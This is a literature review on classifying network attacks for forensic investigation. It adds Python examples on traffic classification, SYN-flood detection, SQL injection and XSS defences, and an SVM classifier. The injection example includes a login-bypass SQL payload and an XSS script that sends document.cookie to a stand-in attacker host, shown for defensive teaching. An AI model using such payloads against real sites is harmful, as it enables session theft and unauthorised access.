Network Attacks Classification for Network Forensics Investigation: Literature Reviews

Every branch of technology must constantly be on guard against the many cybercrimes made possible by ongoing cyber-attacks. Crimes committed in this era of digitalization have a negative impact on individuals and groups. Because mitigation after a cyber-attack is often treated as a trivial problem, cybercriminals can operate freely without worrying about getting caught. Digital forensics not only plays an important role in the digitization cycle but is also critical to the digital industry's ability to respond to incidents as they occur. The standard methods used in digital forensics are very time-consuming and ineffective given the frequency of cybercrime. It is expected that collaboration between technology disciplines, such as the application of machine learning to digital forensics


Introduction
The internet is now widely used by most individuals for a variety of professional and personal tasks, because rapid technological advances have made it easily accessible. The Internet is used for several important activities, including communication, information exchange, and economic transactions. The Internet promotes connection and communication, but attackers aiming to damage and disrupt network connections and network security can violate the integrity and confidentiality of those connections and of the information exchanged over them [1]-[5].
Network attacks are becoming more frequent over time, so they must be investigated and understood, and more effective security defense technologies must be developed in response. Network security solutions are required by every business, sector, and level of government to protect against the increasing threat of cyberattacks. As no network is immune to attack, the need for more reliable and effective network security systems to protect customer and business data keeps growing.
Network forensics is the collection, recording, and investigation of network events with the goal of identifying the origin of security attacks or other problem incidents. In other words, network forensics entails the capture, cataloging, and examination of network traffic. It serves to gather information, compile evidence, and identify attacks. Investigative procedures are performed while managing activity and traffic on the network. Unlike other branches of digital forensics, network forensics deals with volatile information that tends to be lost unless it is captured in time. The investigation process used here consists of the nine stages referred to as the Generic Framework for Network Forensics [6]-[10].
According to Kaspersky reports, DDoS attacks are frequent and hostile every quarter, with targets spanning politics, education, business, and other sectors [11], [12]. Amazon in February 2020, NetScout in April 2018, and GitHub in February 2018 are just a few examples of organizations that have suffered very large DDoS attacks [13]-[15], and Figure 1 shows the year-over-year growth of DDoS attacks.
This paper aims to explore the latest research on attacks on computer networks. The widely varying attacks on computer networks are then classified and mapped, and this classification and mapping is proposed as a basis for future research.

Research Methods
This literature review collected studies related to attacks on computer networks, following the process shown in Figure 2. The search was conducted using several popular databases, namely Google Scholar and ResearchGate, which were chosen because they index a wide range of journals and are suitable for searching very specific research domains. The search used the keywords "network attack", "network hacking", "network forensics", and "machine learning".
Collection and analysis were conducted from January to April 2023. Selection was based on the title, abstract, purpose, and type of network attack, and scientific papers that met the selection criteria were included in the review. After selection, thirty scientific papers on attacks that occur on computer networks were included in the literature review.
Figure 2. Flowchart of the literature review of attacks on computer networks.

Results and Discussions
The results of the search are mapped in Table 1 and Table 2; the mapping leads to the conclusion that the attack categories that occur most often, grouped by the vulnerability in the service system that they exploit, are DDoS, Injection, and Hijacking.
In this mapping, Broken Access Control vulnerabilities are the ones most often used for attacks from the network side. The attack takes the form of flooding the system with access requests so that it can no longer serve legitimate users. This attack is called DDoS; Figures 3, 4 and 5 describe the types of DDoS [18]-[20].
Software and Data Integrity Failures are also often exploited by attackers from the network side. This attack focuses on the application's code, which is hijacked and manipulated. It is very dangerous because it changes the function of the application. In this mapping, such code manipulation is represented by Cross Site Scripting (XSS), in which attacker-controlled script is injected into pages that the application delivers to its users. The XSS mechanism is described in Figure 6 [21]. Identification and Authentication Failures are also widely utilized by attackers to carry out attacks from the network side. This attack focuses on the data repository of a system, i.e. its database, and is carried out by injecting payload code to gain illegal access to the stored data. The literature reviews summarized in Table 1 and Table 2 are the result of mapping previous research related to attacks on computer networks. The studies taken are those that discuss vulnerabilities related to Broken Access Control, Software and Data Integrity Failures, and Identification and Authentication Failures.
Attack mechanisms based on the vulnerabilities mentioned include DDoS, Hijacking and Injection. The rows of Table 1 and Table 2 (Summary of Literature Reviews) are as follows; the mechanism column describes how each attack is carried out:

Ref.   Vulnerability                                                 Attack           Mechanism
       Broken Access Control                                         DoS, DDoS        Flooding network traffic
[24]   Broken Access Control, Software and Data Integrity Failures   DoS, Injection   Flooding network traffic; inserting content not in line with service functions
[25]   Broken Access Control                                         DDoS             Flooding network traffic
[26]   Broken Access Control                                         DDoS             Flooding network traffic
[27]   Broken Access Control                                         DoS              Flooding network traffic
[28]   Broken Access Control                                         DDoS             Flooding network traffic
[29]   Software and Data Integrity Failures                          Injection        Inserting content that does not match the service function
[20]   Broken Access Control                                         DDoS             Flooding network traffic
[30]   Broken Access Control                                         DoS              Flooding network traffic
[31]   Software and Data Integrity Failures                          Injection        Inserting content that does not match the service function
[32]   Software and Data Integrity Failures                          Injection        Inserting content that does not match the service function
[33]   Software and Data Integrity Failures                          Injection        Inserting content that does not match the service function
[21]   Software and Data Integrity Failures                          (row truncated)

The rapid development of the internet has forced most business organizations to follow the current trend with modern and flexible technological innovations for their business processes. DDoS attacks are not the only cyber-attacks with a significant and detrimental impact. OWASP, a non-profit organization that monitors application security, publishes the OWASP Top 10, a list of the most critical vulnerability classes together with the impact of the threats that arise from them, so that individuals and organizations can use it to evaluate the security risks of the systems they manage [46]; the three vulnerability categories used in Table 1 and Table 2 are taken from that list.
Several methods have been proposed to classify network traffic and the attacks within it. The first is the port-based approach, which maps a flow to an application using the port numbers registered with the Internet Assigned Numbers Authority (IANA). This method has proven unreliable as the number of applications has grown, because the port is an unreliable indicator: it does not work for applications that use dynamic port numbers, for applications that never register their ports with IANA, or for traffic deliberately sent over another service's port. Another method is the payload-based method, commonly known as Deep Packet Inspection (DPI), in which the contents of network packets are examined and compared with a database of signatures. This method gives more accurate results than port-based techniques but does not work for applications whose payloads are encrypted [47]-[49].
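The two classification methods described above, as an added example that is not code from the paper or from any of the reviewed tools. The port table is a small subset of real IANA assignments, the DPI signatures are simple prefix checks chosen for illustration, and the flows are constructed, not captured; the example shows one case each of the failure modes the text names (an unregistered port, a service tunnelled over another service's port, and an encrypted payload).

```python
# Added example (not from the paper): port-based vs payload-based (DPI)
# traffic classification on constructed flows. Flows are dicts with the IP
# protocol number, destination port and the first payload bytes.

# Small subset of real IANA service assignments, keyed by (protocol, port).
IANA_PORTS = {
    (6, 22): "ssh",
    (6, 25): "smtp",
    (6, 80): "http",
    (6, 443): "https",
    (17, 53): "dns",
    (6, 3306): "mysql",
}


def _is_http(p: bytes) -> bool:
    return p.startswith((b"GET ", b"POST ", b"HEAD ", b"HTTP/1."))


def _is_tls_handshake(p: bytes) -> bool:
    # TLS record header: content type 0x16 = handshake, version major byte 0x03.
    # Application-data records (0x17) carry encrypted bytes that match nothing.
    return len(p) >= 3 and p[0] == 0x16 and p[1] == 0x03


def _is_ssh(p: bytes) -> bool:
    return p.startswith(b"SSH-")


# Illustrative DPI signature database: (application name, predicate on payload).
DPI_SIGNATURES = [("http", _is_http), ("tls", _is_tls_handshake), ("ssh", _is_ssh)]


def classify_by_port(proto: int, dst_port: int) -> str:
    """Port-based: trust the IANA-registered service for the destination port."""
    return IANA_PORTS.get((proto, dst_port), "unknown")


def classify_by_payload(payload: bytes) -> str:
    """Payload-based (DPI): match the first bytes against known signatures."""
    for name, matches in DPI_SIGNATURES:
        if matches(payload):
            return name
    return "unknown"


def classify_flow(flow: dict) -> dict:
    return {
        "port_based": classify_by_port(flow["proto"], flow["dst_port"]),
        "dpi": classify_by_payload(flow["payload"]),
    }


# Constructed flows (not captured traffic).
FLOWS = [
    # HTTP on an unregistered port: port-based cannot name it, DPI can.
    {"proto": 6, "dst_port": 8080,
     "payload": b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"},
    # SSH sent over 443 to slip past port filters: port-based says https.
    {"proto": 6, "dst_port": 443, "payload": b"SSH-2.0-OpenSSH_9.6\r\n"},
    # TLS handshake on 443: DPI sees TLS, not the application inside it.
    {"proto": 6, "dst_port": 443,
     "payload": bytes([0x16, 0x03, 0x01, 0x02, 0x00, 0x01])},
    # TLS application-data record: encrypted, so DPI has nothing to match.
    {"proto": 6, "dst_port": 443,
     "payload": bytes([0x17, 0x03, 0x03, 0x00, 0x20]) + b"\x8a" * 32},
]


def classify_all(flows=FLOWS):
    return [classify_flow(f) for f in flows]


if __name__ == "__main__":
    for f, r in zip(FLOWS, classify_all()):
        print(f["dst_port"], r)
```

The first flow is the dynamic-port case (port-based gives "unknown", DPI gives "http"); the second shows why a port is only a hint; the last two show that DPI stops at the TLS layer and sees nothing inside an encrypted record.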
DDoS attacks, which prevent authorized users from accessing network services, are one of the most frequent and dangerous forms of attack. Servers become the target of DDoS attacks when the network is flooded with huge volumes of traffic that exhaust network resources. In addition, the IoT era has put a very large number of devices on the Internet, so attackers can use many bots in different places to launch a variety of DDoS attacks, and DDoS attacks carried out through such bot devices are difficult to identify [18]-[20].
These attacks quickly exhaust network resources. A significant DDoS attack can cost some businesses up to $100,000 per hour while also eroding client trust. DDoS attacks can overload multiple layers of a software-defined network (SDN), including the channels between the controller and the application layer and between the controller and the OpenFlow switches. The centralized SDN controller is a single point of failure: if a DDoS attack takes it down, the entire network goes down at once [6], [32], [33], [41], [43].
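The flooding described in the two paragraphs above, as an added example (not from the paper) of the kind of check an investigator runs over packet records: per-source SYN counts in a sliding window, with half-open handshakes as the flood signature. The records are constructed, the addresses are from documentation ranges, and the window and threshold are assumed tuning values.

```python
# Added example (not from the paper): SYN-flood detection over constructed
# packet records (timestamp_seconds, src_ip, dst_ip, tcp_flags). Flags use
# tcpdump's letters: "S" = SYN only, "S." = SYN+ACK, "." = ACK.
from collections import defaultdict

WINDOW_SECONDS = 1.0   # sliding window length (assumed tuning value)
SYN_THRESHOLD = 20     # SYNs per window per source that count as flooding (assumed)


def _peak_in_window(times, window):
    """Largest number of timestamps falling inside any window-long interval."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def synflood_sources(packets, window=WINDOW_SECONDS, threshold=SYN_THRESHOLD):
    """Return {src_ip: peak SYNs per window} for sources that look like flooders.

    A source is flagged when it sends at least `threshold` SYNs inside one
    window and completes fewer than half of them with an ACK (the third
    handshake step), i.e. it is leaving half-open connections behind.
    """
    syns = defaultdict(list)   # src -> SYN timestamps
    acks = defaultdict(int)    # src -> number of ACKs sent
    for ts, src, _dst, flags in packets:
        if flags == "S":
            syns[src].append(ts)
        elif flags == ".":
            acks[src] += 1
    flagged = {}
    for src, times in syns.items():
        peak = _peak_in_window(times, window)
        if peak >= threshold and acks[src] * 2 < len(times):
            flagged[src] = peak
    return flagged


def build_sample():
    """Constructed capture: one benign client and two bots against 10.0.0.1."""
    pkts = []
    for i in range(3):                      # benign: three full handshakes
        t = i * 3.0
        pkts += [(t, "10.0.0.5", "10.0.0.1", "S"),
                 (t + 0.01, "10.0.0.1", "10.0.0.5", "S."),
                 (t + 0.02, "10.0.0.5", "10.0.0.1", ".")]
    for bot in ("198.51.100.10", "198.51.100.11"):   # bots: 30 SYNs in 0.45 s, no ACKs
        pkts += [(5.0 + i * 0.015, bot, "10.0.0.1", "S") for i in range(30)]
    return sorted(pkts)


if __name__ == "__main__":
    flagged = synflood_sources(build_sample())
    print(f"{len(flagged)} flooding sources:", flagged)
```

The number of flagged sources is the distributed part of the picture: a single address over the threshold is a DoS, many addresses each over it at the same time is the botnet case the text describes, and the per-source timestamps kept in `syns` are the evidence an investigator would export.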
Substantial recovery costs are an additional loss for organizations, on top of the loss of integrity caused by the cyberattacks themselves. Activities that damage, disrupt, or steal data, and anything else that harms the owners of systems on computer networks, are illegal and can be prosecuted in court, and criminals can be punished based on the evidence found by network forensics mechanisms [6], [19], [23], [33], [42]. Investigators commonly use network monitoring systems such as an Intrusion Detection System (IDS) for forensic purposes, conducting the investigation from IDS logs and attack notifications. An IDS monitors the network for suspicious activity and reports it immediately as alerts. Most deployed intrusion detection systems are signature-based. Because network traffic is not stationary, the rules that generate alerts fire on an ever-growing variety of traffic, producing a large volume of alerts and many detection errors. Network traffic can also be examined by analyzing the network packets themselves. Network packets are the fundamental object analyzed in network forensics, in order to collect data about network traffic that can serve as evidence in court [21], [34], [39], [44].
The main threats of injection attacks include theft of credentials, forced access to a system, and violation of the integrity of stored data. Among cybercrimes, injection attacks form one family with a wide range of variants, including SQL Injection, Command Injection, XSS, NoSQL Injection, LDAP Injection, and others. SQL Injection has several basic types: in-band SQLi (classic SQLi, including error-based and UNION-based), out-of-band SQLi, and inferential SQLi (blind SQLi, boolean-based or time-based) [31], [50], [51].
The diversity of injection attack types and variants makes injection one of the critical attacks that can cause major damage to a system, leak data, and even paralyze the system. Current technological innovations and developments still cannot stem the attacks caused by injection vulnerabilities [52]-[54].
SQL Injection attacks inject into the queries sent to the target database, while XSS attacks inject malicious client-side code, usually JavaScript, into a web application so that it runs in victims' browsers. Some people think XSS is not a serious threat, but XSS attacks have hit major services such as PayPal (2006), Amazon (2013) and Twitter (2014). XSS allows the perpetrator to perform various harmful actions, including taking over accounts, installing spyware, exploiting the system further, spreading viruses/worms, and even controlling the victim's session remotely [55], [56].
XSS attacks work through malicious code inserted into a system that then runs in the victim's application or browser. Its effect depends on what the injected code does. Generally, XSS code is used to steal cookies, record user activity like spyware or a keylogger, and spread malware. These things are often considered unimportant, but cookie theft in particular is serious: if the stolen cookie is a session cookie, the perpetrator can access the victim's data or account without needing the username/password [57], [58].
Like SQL Injection, XSS has several types with different impacts and threat levels, namely Reflected XSS, Stored XSS and DOM-based XSS. The variety of XSS types, methods and injection variants makes XSS a threat that needs to be watched for, especially since many application systems still ignore it [59], [60].
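The two injection classes discussed above (in-band SQL injection and reflected/stored XSS), as an added example that is not code from the paper: a login query built by string formatting beside its parameterized form, and a comment renderer beside an escaped one. The table, the account and both payloads are constructed; only the standard library is used.

```python
# Added example (not from the paper): vulnerable vs hardened code for the two
# injection types in the text. Everything here is constructed for illustration.
import html
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    con.commit()
    return con


def login_vulnerable(con, name, password):
    # String formatting lets input close the quote and rewrite the WHERE clause.
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    return con.execute(sql).fetchone() is not None


def login_safe(con, name, password):
    # Placeholders: the driver binds the values separately, so a quote in them
    # is just data and can never change the query structure.
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return con.execute(sql, (name, password)).fetchone() is not None


# Classic in-band payload: closes the string and comments out the password check.
SQLI_PAYLOAD = "alice' --"


def render_comment_vulnerable(comment):
    # Untrusted text placed straight into HTML: stored or reflected XSS.
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    # Context-appropriate output encoding turns markup into inert text.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


# Cookie-stealing payload of the kind the text describes (attacker.test is fictitious).
XSS_PAYLOAD = '<script>fetch("https://attacker.test/?c=" + document.cookie)</script>'


def demo():
    con = make_db()
    return {
        "sqli_vulnerable": login_vulnerable(con, SQLI_PAYLOAD, "wrong"),
        "sqli_safe": login_safe(con, SQLI_PAYLOAD, "wrong"),
        "legit_safe": login_safe(con, "alice", "correct horse"),
        "xss_vulnerable": "<script>" in render_comment_vulnerable(XSS_PAYLOAD),
        "xss_safe": "<script>" in render_comment_safe(XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

The SQL case is in-band: the attacker sees the result (a successful login) directly in the response; blind variants use the same quote-breaking but infer the outcome from a true/false page difference or a delay. The escaped comment keeps the attacker's text visible to the reader as text, which is the intended behaviour of a comment field.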
Machine Learning (ML) and data mining techniques play an important role in cyber-attack detection and classification. Machine learning can provide mechanisms to detect and identify new types of attack and help investigators examine evidence in network forensics. Several machine learning studies in various domains have applied these techniques to anomaly-based intrusion detection on network devices. The rapid development of machine learning offers a variety of methods for different needs, each with its own advantages and disadvantages. The Support Vector Machine (SVM) is one machine learning algorithm that can be used for classification because it separates data points by constructing a hyperplane in n-dimensional space, where n is the number of features [2], [26], [28], [33], [35], [40], [41], [43], [49], [61], [62].
The SVM algorithm is considered stable in the classification process and achieves high accuracy.
The amount of data that arises in a network forensic investigation is a challenge for an investigator looking for evidence in abnormal network traffic, network communication and files. Machine learning with the SVM algorithm is expected to make the search for evidence, in the form of abnormal network traffic and traces of attacks on a system, more efficient and accurate. The choice of SVM is based on the suggestions, recommendations and results of previous studies on data classification using machine learning [32], [35], [48], [49], [62], [63].
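The hyperplane classification described above, as an added example that is not code from the paper or from any reviewed study: a linear SVM trained by full-batch subgradient descent on the primal hinge-loss objective (written out by hand rather than with scikit-learn, so it runs with no dependencies), applied to per-source flow features. The three features, their scaling and the labelled training points are assumptions chosen to illustrate the idea, not data from the paper.

```python
# Added example (not from the paper): a linear SVM in the primal form,
# w.x + b = 0 being the separating hyperplane in n-dimensional feature space.
# Training data below is constructed, not captured traffic.


def dot(a, b):
    return sum(x * y for x, y in zip(a, b))


def train_linear_svm(X, y, lam=0.01, lr=0.1, epochs=2000):
    """Minimise (lam/2)*||w||^2 + mean(max(0, 1 - y_i*(w.x_i + b))).

    X: list of feature vectors; y: labels, +1 = attack, -1 = benign.
    Returns (w, b). Points with margin >= 1 contribute no gradient, so only
    the support vectors near the hyperplane shape the final solution.
    """
    n, d = len(X), len(X[0])
    w, b = [0.0] * d, 0.0
    for _ in range(epochs):
        gw, gb = [lam * wi for wi in w], 0.0        # regulariser gradient
        for xi, yi in zip(X, y):
            if yi * (dot(w, xi) + b) < 1:             # inside or across the margin
                for j in range(d):
                    gw[j] -= yi * xi[j] / n
                gb -= yi / n
        w = [wi - lr * gi for wi, gi in zip(w, gw)]
        b -= lr * gb
    return w, b


def predict(model, x):
    w, b = model
    return 1 if dot(w, x) + b >= 0 else -1


# Assumed features per source over a 1 s window, each scaled to roughly [0, 1]:
# (packet rate, fraction of SYN-only packets, fraction of distinct destination ports).
TRAIN_X = [
    [0.10, 0.05, 0.02], [0.20, 0.10, 0.05], [0.15, 0.08, 0.03], [0.05, 0.02, 0.01],  # benign
    [0.90, 0.95, 0.10], [0.80, 0.90, 0.90], [0.95, 0.85, 0.30], [0.85, 0.98, 0.05],  # floods / scans
]
TRAIN_Y = [-1, -1, -1, -1, 1, 1, 1, 1]


def train_demo():
    return train_linear_svm(TRAIN_X, TRAIN_Y)


def training_accuracy(model):
    hits = sum(predict(model, x) == y for x, y in zip(TRAIN_X, TRAIN_Y))
    return hits / len(TRAIN_X)


if __name__ == "__main__":
    m = train_demo()
    print("w =", [round(v, 3) for v in m[0]], "b =", round(m[1], 3))
    print("training accuracy:", training_accuracy(m))
    print("new source:", predict(m, [0.92, 0.90, 0.50]))
```

In practice the features would be computed from a capture (the per-source counts an investigator already extracts) and the model validated on traffic held out from training; a kernel SVM, which the paper's cited studies also use, replaces `dot` with a kernel function and changes nothing else in the picture.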

Conclusion
The literature review conducted in this study reveals significant variation in the types of attacks perpetrated on computer networks. These attacks can be classified by the vulnerabilities the attackers exploit, and the contribution of this review lies in that classification. Three common vulnerabilities targeted by attackers are Broken Access Control, Software and Data Integrity Failures, and Identification and Authentication Failures. Attackers often exploit these vulnerabilities to carry out attacks such as DDoS, Hijacking, and Injection. The review also offers recommendations for future research on classifying network attacks with machine learning algorithms, with the aim of automating the classification process and thereby expediting investigations. The Support Vector Machine (SVM) is a suitable method for this purpose, as it has demonstrated accuracy in data classification in many previous studies.
In addition to the classification of network attacks by vulnerability, future research should focus on developing proactive defense mechanisms to mitigate and prevent such attacks. This can involve intrusion detection and prevention systems that use machine learning algorithms to identify and respond to emerging threats in real time. Exploring anomaly detection techniques and behavioral analysis can further improve the ability to detect and thwart sophisticated attack patterns. By investing in research and innovation in these areas, organizations can strengthen their network security posture and stay one step ahead of cybercriminals.
Jurnal RESTI (Rekayasa Sistem dan Teknologi Informasi) Vol. 7 No. 5 (2023), DOI: https://doi.org/10.29207/resti.v7i5.5153, Creative Commons Attribution 4.0 International License (CC BY 4.0)
As seen in Figure 1, from Cisco's Annual Internet Report 2018-2023, DDoS attacks continue to increase year over year, which, according to Kaspersky, makes it difficult to prevent DDoS attacks of the scale still occurring today. Maintaining service resource operations, reviewing Internet service provider contracts, implementing specialized solutions such as DDoS protection, understanding network traffic, and establishing a backup defense strategy are all ways to reduce DDoS attacks.

Figure 1. Cisco DDoS Annual Report
Still common and unpredictable, injection attacks are a component of cyber-attacks. Several incidents have taken place from a few years ago to the present: the discovery of a SQL injection vulnerability in Cisco Prime License Manager in 2018, SQL injection in the video game Fortnite in 2019, and SQL injection attacks on the Estonian central health database in 2020, which allowed the perpetrators to access the medical records of almost all Estonian citizens, are just a few of the incidents of recent years [16], [17]. Attempts can be made to reduce SQL injection attacks by keeping the system in use fully updated, staying abreast of the risks, and developing strategies to anticipate them.

Table 1. Summary of Literature Reviews

Table 2. Summary of Literature Reviews (Continued)